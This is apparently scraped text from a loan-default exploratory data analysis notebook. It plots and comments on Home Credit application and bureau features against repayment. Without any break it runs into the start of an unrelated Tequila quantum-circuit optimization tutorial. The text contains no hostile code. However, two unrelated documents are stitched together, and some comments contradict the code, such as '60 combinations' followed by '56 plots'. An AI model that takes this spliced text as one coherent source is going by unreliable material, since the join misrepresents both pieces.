plot_count_percent_for_int(application_train, temp_col)- Clients who chose 'no' for CONT_MOBILE FALG is very few.(574) 2.2.6. Phonetemp_col = features_dtype_int[10] plot_count_percent_for_int(application_train, temp_col)- Most clients(72%) don't have work phone. 2.2.7. Region Rating Clienttemp_col = features_dtype_int[12] plot_count_percent_for_int(application_train, temp_col)- Clients who chose 2 for REGION_RATING_CLIENT is numerous, followed by 3, 1.- For not-repayment, the order is 3, 2, 1. 2.2.8. Region Rating Client With Citytemp_col = features_dtype_int[13] plot_count_percent_for_int(application_train, temp_col)- Clients who chose 2 for REGION_RATING_CLIENT with city is numerous, followed by 3, 1.- For not-repayment, the order is 3, 2, 1. 2.2.9. Hour Appr Process Starttemp_col = features_dtype_int[14] plot_count_percent_for_int(application_train, temp_col)- The most busy hour for Appr Process Start is a range from 10:00 to 13:00. 2.2.10. Register region and not live regiontemp_col = features_dtype_int[15] plot_count_percent_for_int(application_train, temp_col)- 98.5% of clients registered their region but not live in the region. 2.2.11. Register region and not work regiontemp_col = features_dtype_int[16] plot_count_percent_for_int(application_train, temp_col)- 95% of clients registered their region but not work in the region. 2.2.12. Live region and not work regiontemp_col = features_dtype_int[17] plot_count_percent_for_int(application_train, temp_col)- 95.9% of clients lives in their region but don't work in the region. - For 3 questions about region(10, 11, 12), the not-repayment percent is similar for each case. 2.2.13. Register city and not live citytemp_col = features_dtype_int[18] plot_count_percent_for_int(application_train, temp_col)- 92.1% of clients registered city and don't live in the city.- Unlike region, city could be good information. Because the difference of the not-repayment percent between 'yes' and 'no' is higher than region case(2.2.10, 2.2.11, 2.2.12) 2.2.14. Register city and not work citytemp_col = features_dtype_int[19] plot_count_percent_for_int(application_train, temp_col)- 78% of clients registered city and don't work in the city.- If client is this case, the not-repayment rate is about 10%. 2.2.15. Live city and not work citytemp_col = features_dtype_int[20] plot_count_percent_for_int(application_train, temp_col)- 82% of clients registered city and don't work in the city.- If client is this case, the not-repayment rate is about 10%. 2.2.16. Flag documentfor i in range(21, 40): temp_col = features_dtype_int[i] plot_count_percent_for_int(application_train, temp_col)- Document 2: 13 clients chose 1 and not-repayment rate is high, about 30%.- Document 4: 25 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid.- Document 10: 7 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid.- Document 12: 2 clients chose 1 and not-repayment rate is 0. all the clients who chose 1 repaid. 2.2.16. Heatmap for int features - Let's see the correlations between the int features. Heatmap helps us to see this easily.data = [ go.Heatmap( z = application_train_int.corr().values, x = application_train_int.columns.values, y = application_train_int.columns.values, colorscale='Viridis', reversescale = False, text = True , ) ] layout = go.Layout( title='Pearson Correlation of float-type features', xaxis = dict(ticks=''), yaxis = dict(ticks='' ), width = 900, height = 700, margin = dict( l = 250 ) ) fig = go.Figure(data=data, layout=layout) py.iplot(fig, filename='labelled-heatmap')- There are some combinations with high correlation coefficient.- FLAG_DOCUMENT_6 and FLAG_EMP_PHONE- DAYS_BIRTH and FLAG_EMP_PHONE- DAYS_EMPLOYED and FLAG_EMP_PHONE- In follow section, we will look those features more deeply using linear regression plot with seaborn. 2.2.17. More analysis for int features which have correlation with target - At first, find the int features which have high correlation with target.correlations = application_train_int.corr()['TARGET'].sort_values() correlations[correlations.abs() > 0.05]- DAYS_BIRTH is some high correlation with target.- With dividing 365(year) and applying abs(), we can see DAYS_BIRTH in the unit of year(AGE).temp_col = 'DAYS_BIRTH' sns.kdeplot((application_train_int.loc[application_train_int['TARGET'] == 0, temp_col]/365).abs(), label='repay(0)', color='r') sns.kdeplot((application_train_int.loc[application_train_int['TARGET'] == 1, temp_col]/365).abs(), label='not repay(1)', color='b') plt.xlabel('Age(years)') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- As you can see, The younger, The higher not-repayment probability.- The older, The lower not-repayment probability. 2.2.18. linear regression analysis on the high correlated feature combinations - With lmplot from seaborn, we can draw linear regression plot very easily. Thanks!sns.lmplot(x='FLAG_DOCUMENT_6', y='FLAG_EMP_PHONE', data=application_train_int) col1 = 'FLAG_DOCUMENT_6' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([application_train[col1].dropna().values[:100000], application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(10, 10)) im = ax.scatter(application_train[col1].dropna().values[:100000], application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that there are many clients who have EMP Phone and chose document 6.sns.lmplot(x='DAYS_BIRTH', y='FLAG_EMP_PHONE', data=application_train_int) col1 = 'DAYS_BIRTH' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(8, 8)) im = ax.scatter(np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that the younger people tend to have EMP phone.sns.lmplot(x='DAYS_EMPLOYED', y='FLAG_EMP_PHONE', data=application_train_int.dropna().loc[:100000, :]) col1 = 'DAYS_EMPLOYED' col2 = 'FLAG_EMP_PHONE' xy = np.vstack([np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000]]) z = gaussian_kde(xy)(xy) fig, ax = plt.subplots(1, 1, figsize=(8, 8)) im = ax.scatter(np.abs((application_train[col1].dropna().values[:100000]/365)), application_train[col2].dropna().values[:100000], c=z, s=50, cmap=plt.cm.jet) ax.set_xlabel(col1) ax.set_ylabel(col2) fig.colorbar(im)- With gaussian kde density represented by color and linear regression plot, we can see that clients with shorter employed tend to have EMP phone. (simiar result compared to FLAG_EMP_PHONE vs DAYS_BIRTH) 2.3. float feature - Let's move on float features. 2.3.1. Heatmap for float features - Let us draw the heatmap of float features.application_train_float = application_train[meta[meta['dtype'] == 'float64'].index] application_train_float['TARGET'] = application_train['TARGET'] data = [ go.Heatmap( z = application_train_float.corr().values, x = application_train_float.columns.values, y = application_train_float.columns.values, colorscale='Viridis', reversescale = False, text = True , ) ] layout = go.Layout( title='Pearson Correlation of float-type features', xaxis = dict(ticks=''), yaxis = dict(ticks='' ), width = 1200, height = 1200, margin = dict( l = 250 ) ) fig = go.Figure(data=data, layout=layout) py.iplot(fig, filename='labelled-heatmap')- There are some features which have some high correlation with target. In follow section, we will find them and analyze them.- There are many feature combinations which have high correlation value(larger than 0.9).- Let's find the combinations. 2.3.2. More analysis for int features which have correlation with target - Let's find the float features which are highly correlated with target.correlations = application_train_float.corr()['TARGET'].sort_values() correlations[correlations.abs() > 0.05] temp_col = 'EXT_SOURCE_1' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- The simple kde plot(kernel density estimation plot) shows that the distribution of repay and not-repay is different for EXT_SOURCE_1.- EXT_SOURCE_1 can be good feature.temp_col = 'EXT_SOURCE_2' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- Not as much as EXT_SOURCE_1 do, EXT_SOURCE_2 shows different distribution for each repay and not-repay.temp_col = 'EXT_SOURCE_3' sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 0, temp_col], label='repay(0)', color='r') sns.kdeplot(application_train_float.loc[application_train_float['TARGET'] == 1, temp_col], label='not repay(1)', color='b') plt.title('KDE for {} splitted by target'.format(temp_col)) plt.show()- EXX_SOUCE_3 has similar trend with EXT_SOURCE_1.- EXT_SOURCE_3 can be good feature. 2.3.3. linear regression analysis on the high correlated feature combinations - Using corr() and numpy boolean technique with triu(), we could obtain the correlation matrix without replicates.corr_matrix = application_train_float.corr().abs() corr_matrix.head() upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool)) upper.head() threshold = 0.9 count = 1 combinations = [] for name, column in upper.iteritems(): if (column > threshold).any(): for col, value in column[column > 0.9].iteritems(): print(count, name, col, value) combinations.append((name, col, value)) count += 1- There are 60 combinations which have larger correlation values than 0.95.- Let's draw the regplot for all combinations with splitting the target.fig, ax = plt.subplots(28, 2, figsize=(20, 400)) count = 0 for i in range(28): for j in range(2): sns.regplot(x=combinations[count][0], y=combinations[count][1], data=application_train_float[application_train_float['TARGET'] == 0], ax=ax[i][j], color='r') sns.regplot(x=combinations[count][0], y=combinations[count][1], data=application_train_float[application_train_float['TARGET'] == 1], ax=ax[i][j], color='b') ax[i][j].set_title('{} and {}, corr:{:.2f} '.format(combinations[count][0], combinations[count][1], combinations[count][2])) ax[i][j].legend(['repay', 'not repay'], loc=0) count += 1- After looking these 56 plots, I found som combinations in which the distribution for repay and not-repay is a bit different.- Let's see this with single and multi variable kde plot.- It is nice to use log-operation on features. With log-operation, we can analyze the distribution more easily.def multi_features_kde_plot(col1, col2): fig, ax = plt.subplots(3, 2, figsize=(14, 20)) g = sns.kdeplot(application_train_float.loc[application_train['TARGET'] == 0, :].dropna().loc[:50000, :][col1], application_train_float.loc[application_train['TARGET'] == 0, :].dropna().loc[:50000, :][col2], ax=ax[0][0], cmap="Reds") g = sns.kdeplot(application_train_float.loc[application_train['TARGET'] == 1, :].dropna().loc[:50000, :][col1], application_train_float.loc[application_train['TARGET'] == 1, :].dropna().loc[:50000, :][col2], ax=ax[0][1], cmap='Blues') ax[0][0].set_title('mutivariate KDE: target == repay') ax[0][1].set_title('mutivariate KDE: target == not repay') temp_col = col1 sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log'.format(temp_col)) temp_col = col2 sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1]) ax[2][1].set_title('KDE for {} with log'.format(temp_col)) col1 = 'OBS_60_CNT_SOCIAL_CIRCLE' col2 = 'OBS_30_CNT_SOCIAL_CIRCLE' multi_features_kde_plot(col1, col2)- The mutivariate kde plot of not-repay is broader than one of repay.- For both CNT_60_SOCIAL_CIRCLE and OBS_30_CNT_SOCIAL_CIRCLE, the distribution of each repay and not-repay is a bit different. Log-operation helps us to see them easily.col1 = 'NONLIVINGAREA_MEDI' col2 = 'NONLIVINGAREA_MODE' multi_features_kde_plot(col1, col2)- This case is similar with previous case.- The mutivariate kde plot of not-repay is broader than one of repay.- For both CNT_60_SOCIAL_CIRCLE and OBS_30_CNT_SOCIAL_CIRCLE, the distribution of each repay and not-repay is a bit different. Log-operation helps us to see them easily. 3. EDA - Bureau - Bureau data contains the information of previous loan history of clients from other company. 3.1. Read and check data# Read in bureau bureau = pd.read_csv('../input/bureau.csv') bureau.head() msno.matrix(df=bureau, figsize=(10, 8), color=(0, 0.6, 1)) bureau.head()3.2. Merge with application_train - A client can have several loans so that merge with bureau data can explode the row of application train.print('Applicatoin train shape before merge: ', application_train.shape) application_train = application_train.merge(bureau.groupby('SK_ID_CURR').mean().reset_index(), left_on='SK_ID_CURR', right_on='SK_ID_CURR', how='left', validate='one_to_one') print('Applicatoin train shape after merge: ', application_train.shape) meta= make_meta_dataframe(application_train)3.3. Analysis on object feature 3.3.1 Credit activebureau.info() temp_col = 'CREDIT_ACTIVE' plot_count_percent_for_object(application_train, temp_col)- Most credit type of clients is 'Closed', 'Active'. - If credit type is finished in the state of bad dept, the not-repayment rate is some high.(20%) 3.3.2 Credit currencytemp_col = 'CREDIT_CURRENCY' plot_count_percent_for_object(application_train, temp_col)- 99.9% of clients chose currency 1.- By the way, the not-repayment rate is high at currency 3. 3.3.3 Credit typetemp_col = 'CREDIT_TYPE' plot_count_percent_for_object(application_train, temp_col)- Clients with consumer credit is most numerous, followed by credit card.- If clients requested loan for the purchase of equipment, the not-repayment rate is high.(23.5%). Next is microloan(20.6%). 3.4. Analysis on int feature 3.4.1 Credit daytemp_col = 'DAYS_CREDIT' plt.figure(figsize=(10, 6)) sns.distplot(application_train.loc[(application_train['TARGET'] == 0), temp_col], bins=100, label='repay(0)', color='r') sns.distplot(application_train.loc[(application_train['TARGET'] == 1), temp_col], bins=100, label='not repay(1)', color='b') plt.title('Distplot for {} splitted by target'.format(temp_col)) plt.legend() plt.show()- There are 2 general(not linear) trends we can see.- The shorter credit days, the more not-repayment.- The larger credit days, the more repayment. 3.4.2 Credit day overduetemp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(1, 2, figsize=(16, 6)) sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col].dropna(), label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0]) ax[0].set_title('KDE for {}'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1]) ax[1].set_title('KDE for {} with log'.format(temp_col)) plt.show()- It is hard to see the trend for now. Let's remove the samples. (overdue < 200)temp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) sns.kdeplot(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {}'.format(temp_col)) application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna().hist(bins=100, ax=ax[0][1], normed=True, color='r', alpha=0.5) application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna().hist(bins=100, ax=ax[0][1], normed=True, color='b', alpha=0.5) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} with log'.format(temp_col)) np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001).hist(bins=100, ax=ax[1][1], normed=True, color='r', alpha=0.5) np.log(application_train.loc[(application_train[temp_col] > 200) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001).hist(bins=100, ax=ax[1][1], normed=True, color='b', alpha=0.5)- As you can see, repay have a litter more right-skewed distribution.- To see more deeply, Let's divide the overdue feature into several groups.def overdue(x): if x < 30: return 'A' elif x < 60: return 'B' elif x < 90: return 'C' elif x < 180: return 'D' elif x < 365: return 'E' else: return 'F' application_train['CREDIT_DAY_OVERDUE_cat'] = application_train['CREDIT_DAY_OVERDUE'].apply(overdue) meta = make_meta_dataframe(application_train) temp_col = 'CREDIT_DAY_OVERDUE_cat' plot_count_percent_for_object(application_train, temp_col)- The clients with short overdue days(<30) is most numerous.- B group has the highest not-repayment rate (19%), followed by C, D, E. A group is the lowest.temp_col = 'CREDIT_DAY_OVERDUE' fig, ax = plt.subplots(1, 2, figsize=(16, 6)) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 0) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 1) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0]) ax[0].set_title('KDE for {} (>30)'.format(temp_col)) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 0) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(np.log(application_train.loc[(application_train['TARGET'] == 1) & (application_train['CREDIT_DAY_OVERDUE'] > 30), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1]) ax[1].set_title('KDE for {} with log (>30)'.format(temp_col)) plt.show()- KDE plot with samples which have overdue larger than 30 shows that the distribution of clients who repaid is larger than that of not-repay clients. 3.4.3 Credit day prolongtemp_col = 'CNT_CREDIT_PROLONG' fig, ax = plt.subplots(1, 2, figsize=(16, 8)) sns.kdeplot(application_train.loc[application_train['TARGET'] == 0, temp_col], label='repay(0)', color='r', ax=ax[0]) sns.kdeplot(application_train.loc[application_train['TARGET'] == 1, temp_col], label='not repay(1)', color='b', ax=ax[0]) plt.title('KDE for {} splitted by target'.format(temp_col)) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 0) & (application_train[temp_col] > 3), temp_col], label='repay(0)', color='r', ax=ax[1]) sns.kdeplot(application_train.loc[(application_train['TARGET'] == 1) & (application_train[temp_col] > 3), temp_col], label='not repay(1)', color='b', ax=ax[1]) plt.title('KDE for {} splitted by target (>3)'.format(temp_col)) plt.show()- There are no clients who have prolong larger than 3. 3.5. Analysis on float feature 3.5.1 Amount credit sumtemp_col = 'AMT_CREDIT_SUM' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) threshold = 2 * 10e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} (> {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold)) plt.show()- As you can see, if credit is lower than 2,000,000, the distribution of each repay and not-repay is similar.- But, if credit is larger than 2,000,000, the distribution of each repay and not-repay is different. Many clients who have very high(> 10,000,000) credit repaid. 3.5.2 Amount credit sum debttemp_col = 'AMT_CREDIT_SUM_DEBT' fig, ax = plt.subplots(2, 2, figsize=(16, 16)) threshold = 2 * 10e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} (> {})'.format(temp_col, threshold)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold)) plt.show()- AMT_CREDIT_SUM_DEBT shows similar trend compared to AMT_CREDIT_SUM.- Many clients with high dept(> 50,000,000) repaid. 3.5.3 Amount credit sum limittemp_col = 'AMT_CREDIT_SUM_LIMIT' fig, ax = plt.subplots(3, 2, figsize=(16, 24)) threshold1 = 1e4 threshold2 = 1e6 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold1)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold1)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {} (> {})'.format(temp_col, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1]) ax[2][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold2)) plt.show()- In rough way, the repay clients have high CREDIT_SUM_LIMIT.- Is it possible to have minus credit sum limit?? 3.5.4 Amount credit sum overduetemp_col = 'AMT_CREDIT_SUM_OVERDUE' fig, ax = plt.subplots(3, 2, figsize=(16, 24)) threshold1 = 1e3 threshold2 = 1e5 sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[0][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] < threshold1) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[0][0]) ax[0][0].set_title('KDE for {} (< {})'.format(temp_col, threshold1)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[0][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] < threshold1) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[0][1]) ax[0][1].set_title('KDE for {} with log (< {})'.format(temp_col, threshold1)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[1][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[1][0]) ax[1][0].set_title('KDE for {} ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[1][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold1) & (application_train[temp_col] < threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[1][1]) ax[1][1].set_title('KDE for {} with log ({} < and < {})'.format(temp_col, threshold1, threshold2)) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna(), label='repay(0)', color='r', ax=ax[2][0]) sns.kdeplot(application_train.loc[(application_train[temp_col] > threshold2) &(application_train['TARGET'] == 1), temp_col].dropna(), label='not repay(1)', color='b', ax=ax[2][0]) ax[2][0].set_title('KDE for {} (> {})'.format(temp_col, threshold2)) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 0), temp_col].dropna()+0.00001), label='repay(0)', color='r', ax=ax[2][1]) sns.kdeplot(np.log(application_train.loc[(application_train[temp_col] > threshold2) & (application_train['TARGET'] == 1), temp_col].dropna()+0.00001), label='not repay(1)', color='b', ax=ax[2][1]) ax[2][1].set_title('KDE for {} with log (> {})'.format(temp_col, threshold2)) plt.show()Tutorial: Optimization Hello, and welcome to our tutorial on optimization. Here, we will explore three of Tequila's built in optimizers. Chiefly, we will cover the gradient descent (GD) optimizer, we will also discuss the Phoenics and GPyOpt bayesian optimizers that can be accessed through Tequila. 1: The GD optimizer.### start at the start: import statements! import tequila as tq import numpy as np from tequila.optimizers.optimizer_gd import minimize as gd_minWe start by selecting an objective to optimize. We will begin with a fairly simple, 2-qubit expectationvalue. We will optimize our 2-qubit circuit with the simple, but non trivial hamiltonian $[Y(0)+Qm(0)]\otimes X(1)$, where $Qm=\frac{1}{2} (I + Z)$, the projector onto the 0 state.### optimizing the circuit in terms of pi makes the result of the optimization easier to interpret. a = tq.Variable(name="a")*tq.numpy.pi b = tq.Variable(name="b")*tq.numpy.pi c = tq.Variable(name="c")*tq.numpy.pi d = tq.Variable(name='d')*tq.numpy.pi U = tq.gates.H(target=[0]) U += tq.gates.H(target=1) U += tq.gates.Ry(target=0, angle=a) U += tq.gates.Rz(target=1, angle=b) U += tq.gates.Z(target=1,control=0) U += tq.gates.Rx(target=0, angle=c) U += tq.gates.Rx(target=1,angle=d) U += tq.gates.Z(target=1,control=0) ### once we have a circuit, we pick a hamiltonian to optimize over H=(tq.paulis.Y(0)+tq.paulis.Qm(0))*tq.paulis.X(1) O=tq.ExpectationValue(U=U,H=H) 